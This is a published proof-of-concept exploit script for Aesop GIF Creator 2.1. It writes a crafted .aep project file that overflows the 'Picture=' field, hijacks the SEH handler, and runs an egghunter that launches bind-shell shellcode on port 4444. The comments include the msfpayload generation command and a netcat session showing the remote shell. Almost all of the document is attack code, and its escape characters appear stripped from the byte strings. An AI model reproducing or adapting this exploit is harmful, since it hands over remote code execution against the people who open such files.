Aesop GIF Creator 2.1 Buffer Overflow
Posted on 17 December 2010
# !/usr/bin/python # Exploit Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit # Date: 12/15/2010 # Author: xsploitedsec # URL: http://www.x-sploited.com/ # Contact: xsploitedsec [at] x-sploited.com # Software Link: http://www.yukudr.com/_h84561/aesop_setup.exe # Vulnerable version: <= v2.1 # Tested on: Windows XP SP3 Eng # CVE : N/A #### Software Description: # Aesop is a powerful tool that allows you to create animated GIF images (banners, buttons, labels and headings) # for your website and even GIF wallpapers for your mobile phone quickly and easily (click to see samples). You # can use an antialiased 3D-Text, shapes (rectangles, rounded rectangles, ellipses and polygons) and external # pictures for drawing in your GIF. # Convenient interface. # Unicode support - you can use national characters as Text in your GIF. # An excellent antialiasing technique (blurring the edges between color transitions) to draw 3D-Text and shapes: #### Exploit information: # Aesop is prone to a buffer overflow when handling a malicious aesop project files. The vulnerability # is due to improper bounds checking of the "Picture=" field which can be exploited by malicious people to # compromise a users system. #### Other information: # I attempted to reach out to the vendor about this but after a few short emails it became clear that they # had no interest in verifying it/coordinating a fix so here's the exploit. #### Notes: # I always knew that one day I would end up needing to deal with unicode buffers. After a couple nights of # tinkering around this is the end result. P.S. - When all else fails->Fail harder #### Shoutz: # kAoTiX, Sheep, Tu, edb-team, corelan team, packetstormsecurity and all other security researchers and sites. # -> A big thanks goes to corelanc0d3r for shedding some light on the subject of unicode exploits. ;) import struct import sys about = " ================================================================== " about += " Title: Aesop GIF Creator <= v2.1 (.aep) Buffer Overflow Exploit PoC " about += " Author: xsploitedsec URL: http://www.x-sploited.com/ " about += " Contact: xsploitedsecurity [at] x-sploited.com " about += "==================================================================" print about # root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost=0.0.0.0 EXITFUNC=seh R # | msfencode -e x86/alpha_upper -c 1 -t c -b 'x1ax19x0a' > /tmp/aesop.txt # [*] x86/alpha_upper succeeded with size 752 (iteration=1) # # root@bt:~# ncat 10.0.1.16 4444 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # C:> # Unmolested, ASCII shellcode buried in stack ftw!? bindshell = ( "xdaxcaxd9x74x24xf4x58x50x59x49x49x49x43x43x43" "x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43" "x30x43x30x43x50x4dx59x4dx35x50x31x4ex32x42x44" "x4cx4bx51x42x50x30x4cx4bx46x32x44x4cx4cx4bx50" "x52x44x54x4cx4bx44x32x47x58x44x4fx48x37x50x4a" "x47x56x50x31x4bx4fx46x51x4fx30x4ex4cx47x4cx45" "x31x43x4cx44x42x46x4cx47x50x4fx31x48x4fx44x4d" "x43x31x48x47x4dx32x4cx30x50x52x51x47x4cx4bx51" "x42x42x30x4cx4bx47x32x47x4cx43x31x48x50x4cx4b" "x47x30x44x38x4cx45x4fx30x43x44x50x4ax43x31x48" "x50x46x30x4cx4bx51x58x44x58x4cx4bx51x48x51x30" "x43x31x4ex33x4ax43x47x4cx47x39x4cx4bx50x34x4c" "x4bx45x51x4ex36x46x51x4bx4fx46x51x49x50x4ex4c" "x4fx31x48x4fx44x4dx43x31x48x47x50x38x4bx50x42" "x55x4cx34x45x53x43x4dx4bx48x47x4bx43x4dx51x34" "x42x55x4ax42x50x58x4cx4bx46x38x51x34x45x51x48" "x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c" "x43x31x4ex33x4cx4bx45x54x4cx4bx45x51x48x50x4c" "x49x47x34x46x44x47x54x51x4bx51x4bx45x31x46x39" "x51x4ax50x51x4bx4fx4bx50x51x48x51x4fx51x4ax4c" "x4bx42x32x4ax4bx4cx46x51x4dx43x58x47x43x46x52" "x45x50x45x50x45x38x43x47x44x33x47x42x51x4fx51" "x44x43x58x50x4cx42x57x46x46x43x37x4bx4fx49x45" "x4fx48x4ax30x43x31x43x30x45x50x51x39x49x54x51" "x44x46x30x43x58x51x39x4bx30x42x4bx43x30x4bx4f" "x4ex35x46x30x46x30x50x50x50x50x47x30x50x50x51" "x50x50x50x45x38x4ax4ax44x4fx49x4fx4dx30x4bx4f" "x4ex35x4bx39x48x47x46x51x49x4bx51x43x45x38x44" "x42x45x50x42x31x51x4cx4bx39x4bx56x42x4ax44x50" "x51x46x46x37x45x38x49x52x49x4bx50x37x45x37x4b" "x4fx4ex35x46x33x51x47x43x58x48x37x4ax49x47x48" "x4bx4fx4bx4fx4ex35x50x53x46x33x46x37x42x48x43" "x44x4ax4cx47x4bx4dx31x4bx4fx4ex35x50x57x4bx39" "x49x57x42x48x44x35x42x4ex50x4dx45x31x4bx4fx49" "x45x45x38x43x53x42x4dx45x34x43x30x4cx49x4bx53" "x50x57x50x57x51x47x46x51x4ax56x43x5ax45x42x50" "x59x50x56x4dx32x4bx4dx43x56x48x47x51x54x47x54" "x47x4cx43x31x43x31x4cx4dx51x54x51x34x44x50x4f" "x36x43x30x51x54x50x54x46x30x46x36x46x36x46x36" "x51x56x50x56x50x4ex50x56x50x56x50x53x46x36x43" "x58x44x39x48x4cx47x4fx4dx56x4bx4fx49x45x4cx49" "x4dx30x50x4ex46x36x47x36x4bx4fx46x50x42x48x43" "x38x4bx37x45x4dx43x50x4bx4fx48x55x4fx4bx4bx4e" "x44x4ex46x52x4bx5ax43x58x4ex46x4cx55x4fx4dx4d" "x4dx4bx4fx48x55x47x4cx45x56x43x4cx45x5ax4bx30" "x4bx4bx4dx30x43x45x43x35x4fx4bx47x37x45x43x43" "x42x42x4fx42x4ax43x30x51x43x4bx4fx4ex35x45x5a" "x41x41" ); # unicode encoded, egg="w00t" egg_hunter = ( "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ" "1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY" "AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J" "O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA" ); # aesop project file header prj_header = ( "x5Bx41x65x73x6Fx70x20x50x72x6Fx6Ax65x63x74x20x46x69x6C" "x65x20x76x2Ex32x2Ex30x5Dx0Dx0Ax7Bx50x69x63x74x75x72x65" "x3D" ); #hunter tag ="w00tw00t" egg = "x77x30x30x74x77x30x30x74"; seh_offset = 669; # Begin payload buffer payload = "x41" * seh_offset; # NSEH payload += "x61"; #popad payload += "x73"; #nopalign/add byte ptr [ebx],dh # SE handler payload += "xB1x42"; #unicode compatible p/p/r - Aesop.exe (universal) # Prepare/jump->EAX payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x55"; #push ebp payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x58"; #pop eax payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x05x19x11"; #add eax, 0x19002200h payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x2dx11x11"; #sub eax, 0x12007200h payload += "x73"; #venetian/add byte ptr [ebx],dh payload += "x50"; #push eax payload += "x73"; #add byte ptr [ebx],dh payload += "xc3"; #ret payload += "x41" * 242; #align egghunter with->(ebp+650) payload += egg_hunter; payload += "x41" * 1000; #give shellcode some breathing room payload += egg; payload += bindshell; payload += "x44" * (5000-len(payload)); #junk padding # End payload buffer xsploitme = (prj_header + payload); print(" [*] Creating file->xsploited.aep"); try: out_file = open("xsploited.aep",'w'); out_file.write(xsploitme); out_file.close(); print("[+] xsploited.aep created successfully"); print("[*] 1. Launch the file or open it via Aesop.exe"); print("[*] 2. Wait a sec for egghunter and netcat in :) [-] Exiting... "); except (IOError): print("[!] Error creating file [-] Exiting... ");
